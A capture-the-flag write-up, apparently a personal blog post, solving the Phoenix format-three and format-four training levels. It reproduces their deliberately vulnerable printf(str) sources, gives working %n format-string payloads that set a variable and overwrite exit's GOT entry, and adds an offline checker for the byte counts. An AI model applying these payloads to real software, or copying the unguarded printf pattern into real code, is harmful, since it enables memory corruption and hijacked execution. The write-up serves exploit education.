BuringStraw

[pwn notes 5] format-three, format-four (phoenix)

These two levels do not seem to have an x86_64 solution.

format-three

/*
 * phoenix/format-three, by https://exploit.education
 *
 * Can you change the "changeme" variable to a precise value?
 *
 * How do you fix a cracked pumpkin? With a pumpkin patch.
 */

#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BANNER \
  "歡迎來到 " LEVELNAME ",由 https://exploit.education 提供"

int changeme;

void bounce(char *str) {
  printf(str);
}

int main(int argc, char **argv) {
  char buf[4096];
  printf("%s\n", BANNER);

  if (read(0, buf, sizeof(buf) - 1) <= 0) {
    exit(EXIT_FAILURE);
  }

  bounce(buf);

  if (changeme == 0x64457845) {
    puts("做得好,'changeme' 變數已經正確修改!");
  } else {
    printf(
        "下次再努力 - 得到了 0x%08x,但想要的是 0x64457845!\n", changeme);
  }

  exit(0);
}

Use %n and change one byte at a time. Because the output length only ever grows, the first write happens once 0x145 bytes have been printed, the second at 0x178, and so on.

Why isn't the first one 0x45 bytes? Because we first have to consume the 10 items on the stack before we reach the start of our own input, which is the target of %n.

Note that this is python2 (same below).

from pwn import *
p = process("/opt/phoenix/i486/format-three")
# four pointers (changeme at 0x08049844, then +1, +2, +3), padding so that exactly 0x145
# bytes have been printed when the first %n fires, 11 x "%08x " to step over the stack words
# in front of the buffer, then one %n per byte, padded so the low byte of each count is the
# byte we want (0x45, 0x78, 0x45, 0x64 -> 0x64457845)
p.sendline("\x44\x98\x04\x08\x45\x98\x04\x08\x46\x98\x04\x08\x47\x98\x04\x08"+"A"*(0x145-99-4*4)+"%08x "*11+"%n"+"a"*((0x178-0x145))+"%n"+"a"*(0x245-0x178)+"%n"+"a"*(0x264-0x245)+"%n")
p.interactive()

format-four

/*
 * phoenix/format-four, by https://exploit.education
 *
 * Can you affect code execution? Once you've got congratulations() to
 * execute, can you then execute your own shell code?
 *
 * Did you get a hair cut?
 * No, I got all of them cut.
 *
 */

#include <err.h>
#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#define BANNER \
  "歡迎來到 " LEVELNAME ",由 https://exploit.education 提供"

void bounce(char *str) {
  printf(str);
  exit(0);
}

void congratulations() {
  printf("做得好,你重定向了程式執行!\n");
  exit(0);
}

int main(int argc, char **argv) {
  char buf[4096];

  printf("%s\n", BANNER);

  if (read(0, buf, sizeof(buf) - 1) <= 0) {
    exit(EXIT_FAILURE);
  }

  bounce(buf);
}

Write into the GOT and overwrite the address of exit. (I spent half a day working out how to change the return address, and in the end...)

This leaves the program unable to exit, so it loops forever: congratulations() itself calls exit(), which now goes through the overwritten GOT entry straight back into congratulations().

# same construction, aimed at the GOT entry of exit (0x080497e4 .. 0x080497e7); the four
# counts 0x103, 0x185, 0x204, 0x208 assemble the replacement address 0x08048503 byte by byte
payload="\xe4\x97\x04\x08\xe5\x97\x04\x08\xe6\x97\x04\x08\xe7\x97\x04\x08"+"A"*(0x103-99-4*4)+"%08x "*11+"%n"+"a"*((0x185-0x103))+"%n"+"a"*(0x204-0x185)+"%n"+"a"*(0x208-0x204)+"%n"
# written to a file so it can be fed to the binary on stdin
open("/home/user/buf","wb").write(payload)
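To check the byte-count arithmetic behind both payloads (format-three and format-four) without touching the binary, here is a small Python 3 checker I added; it is not part of the original post or of Phoenix. It replays each payload through a model of 32-bit printf (every %08x is assumed to print exactly 8 characters, and the pointers are assumed to start at the 12th argument, i.e. after 11 stack words), records what each %n stores, and then lands those overlapping 4-byte stores in a tiny memory image so you can see the resulting value and the bytes that spill past the target.

```python
import re
import struct

# Constructed Python 3 copies of the two payloads from this post, so the checker runs offline.
CHANGEME = 0x08049844           # format-three target, taken from the payload's first pointer
EXIT_GOT = 0x080497e4           # format-four target (GOT slot of exit), likewise from the payload
FORMAT_THREE = (struct.pack("<4I", *range(CHANGEME, CHANGEME + 4))
                + b"A" * (0x145 - 99 - 4 * 4) + b"%08x " * 11 + b"%n"
                + b"a" * (0x178 - 0x145) + b"%n" + b"a" * (0x245 - 0x178) + b"%n"
                + b"a" * (0x264 - 0x245) + b"%n")
FORMAT_FOUR = (struct.pack("<4I", *range(EXIT_GOT, EXIT_GOT + 4))
               + b"A" * (0x103 - 99 - 4 * 4) + b"%08x " * 11 + b"%n"
               + b"a" * (0x185 - 0x103) + b"%n" + b"a" * (0x204 - 0x185) + b"%n"
               + b"a" * (0x208 - 0x204) + b"%n")

def n_writes(payload, slots_before_buf=11):
    """Replay the payload through a model of 32-bit printf: %08x always emits
    8 characters, literal bytes count one each, and each %n stores the running
    count through the next pointer argument. The first slots_before_buf
    arguments are untouched stack words (an assumption matching the payload);
    after them the arguments are the 4-byte pointers at the start of the
    payload itself. Returns [(address, count_stored), ...] in store order."""
    count, arg, writes = 0, 0, []
    for m in re.finditer(rb"%08x|%n|[^%]+", payload):
        tok = m.group()
        if tok == b"%08x":
            count, arg = count + 8, arg + 1
        elif tok == b"%n":
            slot = arg - slots_before_buf      # which pointer inside the buffer
            writes.append((struct.unpack_from("<I", payload, 4 * slot)[0], count))
            arg += 1
        else:
            count += len(tok)
    return writes

def land_writes(writes, target):
    """Apply the %n stores to an 8-byte image starting at target. Every %n stores
    a full int, so the stores overlap: only the low byte of each is intended and
    the last one spills past target+3. Returns (value at target, spilled bytes)."""
    mem = bytearray(8)
    for addr, count in writes:
        struct.pack_into("<I", mem, addr - target, count)
    return struct.unpack_from("<I", mem, 0)[0], bytes(mem[4:])

if __name__ == "__main__":
    for name, payload, target in (("format-three", FORMAT_THREE, CHANGEME),
                                  ("format-four", FORMAT_FOUR, EXIT_GOT)):
        w = n_writes(payload)
        print(name, [(hex(a), hex(c)) for a, c in w], hex(land_writes(w, target)[0]))
```

The spilled bytes are the caveat to keep in mind: the fourth %n also writes 0x02 0x00 0x00 into the three bytes after the target, which is harmless here but would matter if something live sat right behind it.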